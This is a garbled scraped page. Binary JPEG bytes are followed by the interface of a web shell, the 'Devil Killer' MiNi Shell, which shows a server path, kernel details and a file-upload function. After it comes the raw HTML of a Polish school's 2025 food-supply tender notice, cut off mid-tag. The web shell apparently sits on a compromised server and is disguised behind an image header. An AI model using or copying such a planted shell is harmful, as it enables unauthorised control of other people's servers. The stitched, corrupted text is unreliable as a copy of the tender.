JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241203/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20241203/0062907701-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa Żywności na potrzeby Szkoły Podstawowej nr 4 im. Mikołaja Kopernika w Bytomiu na rok 2025 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Szkoła Podstawowa nr 4 im. Mikołaja Kopernika</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">SP4</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000723017</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Chrobrego 9</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Bytom</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">41-902</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL228 - Bytomski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">32 281-22-41</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ksiegowosc@spnr4.bytom.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://spnr4.bytom.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa Żywności na potrzeby Szkoły Podstawowej nr 4 im. Mikołaja Kopernika w Bytomiu na rok 2025 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c5784430-78fd-4c4c-86c2-39cbc7092c51</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00629077</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-12-03</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00528401/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.3 Dostawa Żwności na potrzeby Szkoły Podstawowej nr 4 im. Mikołaja Kopernika w Bytomiu na rok 2025</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-c5784430-78fd-4c4c-86c2-39cbc7092c51 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja , w tym składania ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym<br/>a Wykonawcami odbywa się przy użyciu Platformy e-Zamówienia dostępna jest pod adresem :https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu <br/>&#34; Wykonawca&#34;na Platformie e- Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e - Zamówienia określa Regulamin Platformy e- Zamówienia dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje w zakładce &#34; Centrum Pomocy &#34;. Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści zapisanej w postaci papierowej ( cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych.Komunikacja w postępowaniu z wyłączeniem składania ofert,odbywa się za pośrednictwem formularzy do komunikacji dostępnych w zakładce &#34;Formularze&#34; ( Formularze do komunikacji) .Za pośrednictwem &#34; Formularze do komunikacji odbywa się w szczególności przekazywanie wezwań i zawiadomień , zadawanie pytań .Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wezwań i zawiadomień , zadawanie pytań. Maksymalny rozmiar plików przesyłanych za pośrednictwem &#34; Formularzy do komunikacji &#34;wynosi 150 MB ( wielkość ta dotyczy plików przesyłanych jako załączniki do jednego formularza ). Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e -zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e - Zamówienia. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości ( przycisk &#34; dodaj załącznik&#34;). W przypadku załączników , które są zgodne z ustawą Pzp lub rozporządzeniem Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, mogą być opatrzone zgodnie z wyborem wykonawcy /wykonawcy wspólnie ubiegającego się o udzielenie zamówienia / podmiotu udostępniającego zasoby , podpisem typu zewnętrznego lub wewnętrznego .w zależności od rodzaju podpisu i jego typu ( zewnętrzny , wewnętrzny ) dodaje się uprzednio podpisane dokumenty wraz z wygenerowanym plikiem podpisu( typ zewnętrzny ) lub dokument<br/> ( typ wewnętrzny) . W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e- Zamówienia użytkownicy mogą skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu 022 458-77-99 lub drogą elektroniczną poprzez formularz udostępniony na stronie internetowej : https://ezamowienia.gov.pl w zakładce &#34; Zgłoś problem&#34;. W przypadkach uniemożliwiających komunikację Wykonawcy i Zamawiającego za pośrednictwem Platformy e-Zamówienia , Zamawiający dopuszcza komunikację ( za wyjątkiem złożenia oferty ) za pomocą poczty elektronicznej na adres e-mail : ksiegowosc@spnr4.bytom.pl<br/>Wykonawca sporządza :<br/>a) Ofertę - załącznik nr2 do SWZ<br/>b) Formularz cenowy<br/>c) Oświadczenie o niepodleganiu wykluczenia z postępowania - załącznik nr 3 do SWZ<br/>d) Pełnomocnictwa jeżeli dotyczy <br/>Szczegółowe informacje i wymagania opisano w SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art.13 ust.1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że:<br/>1) Administratorem Pani/Pana danych osobowych<br/>Szkoła Podstawowa nr 4 im. Mikołaja Kopernika reprezentowana przez dyrektora mgr. Jacka Wadowskiego, 41-902 Bytom ul. Chrobrego 9 , tel. 32 281-30-35 , e-mail : szkola@spnr4.bytom.pl , http://spnr4.bytom.pl.<br/>2)Dane Inspektora Ochrony danych osobowych jest : Inspektor IOD – Marzena Kryszkowska , Urząd Miejski 41-902 Bytom ul. Smolenia 35 , E-mail iod_edu@um.bytom.pl<br/>3) Została wyznaczona osoba do kontaktu w sprawie przetwarzania danych osobowych , adres e-mail : iod_edu@um.bytom.pl<br/>4) Pani/Pana dane osobowe przetwarzane będą na podstawie art.6 ust.1 lit. c RODO w celu<br/>związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego (a w przypadku dokonania wyboru złożonej oferty jako najkorzystniejszej i zawarciu umowy, także w celu związanym z realizacją zamówienia);<br/>a) zawarcia Umowy<br/>b) realizacja i rozliczenie umowy <br/>c) archiwizacja dokumentacji<br/>5) Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia Prawo zamówień publicznych. <br/>6) Pani/Pana dane osobowe będą przechowywane do czasu zniszczenia dokumentacji postępowania zgodnie z obowiązującymi przepisami prawa lub umową o dofinansowanie, lecz nie krócej niż przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia publicznego, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy (zgodnie z art.78 ust.4 ustawy Prawo zamówień publicznych).<br/>7) Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Prawo zamówień publicznych, związanych z udziałem w postępowaniu o udzielenie zamówienia publicznego. Konsekwencje niepodania określonych danych wynikają z ustawy Prawo zamówień publicznych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SP4/2632/2/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">8</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> MIĘSO I PRODUKTY MIĘSNE <br/>- Mięso najwyższej jakości , świeże , niemrożone , nierozmrażane , o barwie i zapachu charakterystycznym dla danego rodzaju, jędrne ,elastyczne , pochodzące z produkcji krajowej .<br/>- Wędliny najwyższej jakości , świeże , osłony ściśle przylegające do farszu , o czystej , suchej powierzchni oraz charakterystycznym dla danego asortymentu zapachu i wyglądzie .<br/>-Wędliny powinny być powinna być pakowane w atmosferze chronionej<br/>- Barwa mięsa wieprzowego świeżego powinna być bladoróżowa do czerwonej , mięso powinno być soczyste , zapach , konsystencja . powierzchnia i przekrój mają świadczyć o świeżości i jakości produktu, dopuszczona niewielka naturalna ilość okrywy tłuszczowej .<br/>- W przypadku mięs tłustych ( karczek oraz błon np. schab b/k) Wędliny , szynki i kiełbasy - zawartość mięsa min. 85%, smak i zapach charakterystyczny<br/>- Dla mięsa peklowanego , parzonego i użytych przypraw , konsystencja ścisła , barwa na przekroju jasno różowa.<br/>- Termin przydatności produktów do spożycia ma być nie krótszy niż 14 dni od dostawy do Zamawiającego dla wędlin i kiełbas oraz 5 dni dla mięsa świeżego . </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15110000-2 - Mięso</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15131100-6 - Produkty mięsno-wędliniarskie</p> <p class="mb-0">15131130-5 - Wędliny</p> <p class="mb-0">15131135-0 - Wędliny drobiowe</p> <p class="mb-0">15131310-1 - Pasztety</p> <p class="mb-0">15100000-9 - Produkty zwierzęce, mięso i produkty mięsne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-02 do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas wymiany towaru na pełnowartościowy lub na uzupełnienie braku w dostawie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Warzywa i owoce mrożone oraz ryby mrożone<br/>Owoce i warzywa mrożone najwyższej jakości , pierwszego gatunku , o kształcie i barwie charakterystycznej dla produktu wyjściowego , sypkie , nie zbrylowane.Zamawiający zamawia, a Wykonawca zobowiązuje się dostarczyć artykuły żywnościowe I<br/>gatunku w ilości , asortymencie i cenie określonej w załączniku do umowy , stanowiącym jej<br/>integralną część.<br/>Zamawiający zastrzega sobie prawo odbioru mniejszej ilości zamówionych produktów aniżeli<br/>określona jest w załączniku do umowy.<br/>Jednocześnie Zamawiający gwarantuje realizację umowy na poziomie 60% jej wartości.<br/>Wykonawcy nie przysługują żadne roszczenia z tytułu niezrealizowania pozostałej części<br/>umowy, w szczególności z tytułu praw do zapłaty czy odszkodowania.<br/>Zamawiający zastrzega sobie prawo do żądania od Wykonawcy zwiększenia rozmiaru dostaw<br/>danego asortymentu kosztem odpowiedniego zmniejszenia ilościowego dostaw innego towaru,<br/>przy niezmienionej całkowitej wartości umowy.<br/>Wykonawca gwarantuje w szczególności , że dostarczone produkty będą :<br/>1) pierwszego gatunku , dopuszczone do obrotu zgodnie z obowiązującymi wymogami ,<br/>normami i atestami;<br/>2) świeże z datą przydatności do spożycia pozwalającą na prawidłowe wykorzystanie produktu;<br/>3) o właściwej gramaturze , czyste , bez objawów nadpsucia czy pleśni bez obcych zapachów ;<br/>4) dostarczane produkty będą w nienaruszonym oryginalnym opakowaniu zawierającym<br/>informacje istotne ze względu na ochronę zdrowia lub życia człowieka ( skład produktu , datę<br/>przydatności do spożycia, dane identyfikujące producenta lub podmiot wprowadzający produkt<br/>do obrotu )<br/>5) zachowa wymagane przepisami warunki transportu i przechowywanie dostarczanego towaru,<br/>produkty przewożone będą w taki sposób , aby nie została naruszona ich jakość ;<br/>6) asortyment dostarczany będzie w sposób gwarantujący jego ochronę przed uszkodzeniami<br/>transportowymi ;<br/>CECHY DYSKWALIFIKUJĄCE DOSTARCZANE PRODUKTY TO W SZCZEGÓLNOŚCI DLA<br/>MROŻONEK :<br/>1) Produkty przypominające bryłę lodu , tj. zbite w kulę ( wyjątek stanowi posiekany szpinak i<br/>buraki ) , produkty szare , sine , mrożonki bez opakowania tzw. &#34; na wagę&#34; . których opakowanie<br/>nosi ślady naruszenia np. rozerwana torebka , wgniecenia na pudełku. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15331170-9 - Warzywa mrożone</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15220000-6 - Ryby mrożone, filety rybne i pozostałe mięso ryb</p> <p class="mb-0">15240000-2 - Ryby puszkowane i pozostałe ryby konserwowane lub przetworzone</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-02 do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas wymiany towaru na pełnowartościowy lub na uzupełnienie braku w dostawie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Produkty mleczarskie - Nabiał<br/>Produkty mleczarskie i nabiał<br/>Zamawiający zamawia,a Wykonawca zobowiązuje się dostarczyć artykuły żywnościowe I<br/>gatunku w ilości , asortymencie i cenie określonej w załączniku do umowy , stanowiącym jej<br/>integralną część.<br/>Zamawiający zastrzega sobie prawo odbioru mniejszej ilości zamówionych produktów aniżeli<br/>określona jest w załączniku do umowy.<br/>Jednocześnie Zamawiający gwarantuje realizację umowy na poziomie 60% .<br/>Wykonawcy nie przysługują żadne roszczenia z tytułu niezrealizowania pozostałej części<br/>umowy, w szczególności z tytułu praw do zapłaty czy odszkodowania.<br/>Zamawiający zastrzega sobie prawo do żądania od Wykonawcy zwiększenia rozmiaru dostaw<br/>danego asortymentu kosztem odpowiedniego zmniejszenia ilościowego dostaw innego towaru,<br/>przy niezmienionej całkowitej wartości umowy.<br/>Wykonawca gwarantuje w szczególności , że dostarczone produkty będą :<br/>1) pierwszego gatunku , dopuszczone do obrotu zgodnie z obowiązującymi wymogami ,<br/>normami i atestami;<br/>2)świeże z datą przydatności do spożycia pozwalającą na prawidłowe wykorzystanie produktu;<br/>3) o właściwej gramaturze , czyste , bez objawów nadpsucia czy pleśni bez obcych zapachów ;<br/>4) dostarczane będą w nienaruszonym oryginalnym opakowaniu zawierającym informacje<br/>istotne ze względu na ochronę zdrowia lub życia człowieka ( skład produktu , datę przydatności<br/>do spożycia, dane identyfikujące producenta lub podmiot wprowadzający produkt do obrotu );<br/>5) przewożone będą w taki sposób , aby nie została naruszona ich jakość ;<br/>6) asortyment dostarczany będzie w sposób gwarantujący jego ochronę przed uszkodzeniami<br/>transportowymi ;<br/>CECHY DYSKWALIFIKUJĄCE DOSTARCZANE PRODUKTY TO :<br/>1) dla wyrobów mleczarskich : obce posmaki , zapachy , smak gorzki , mocno kwaśny , słony ,<br/>stęchły , mdły , zanieczyszczenia mechaniczne , organiczne , objawy pleśnienia , psucia ,<br/>uszkodzenia mechaniczne , zdeformowanie, zgniecenia , porozrywanie , obecność szkodnikó<br/>oraz ich pozostałości , brak oznakowania opakowań. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15500000-3 - Produkty mleczarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-02 do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 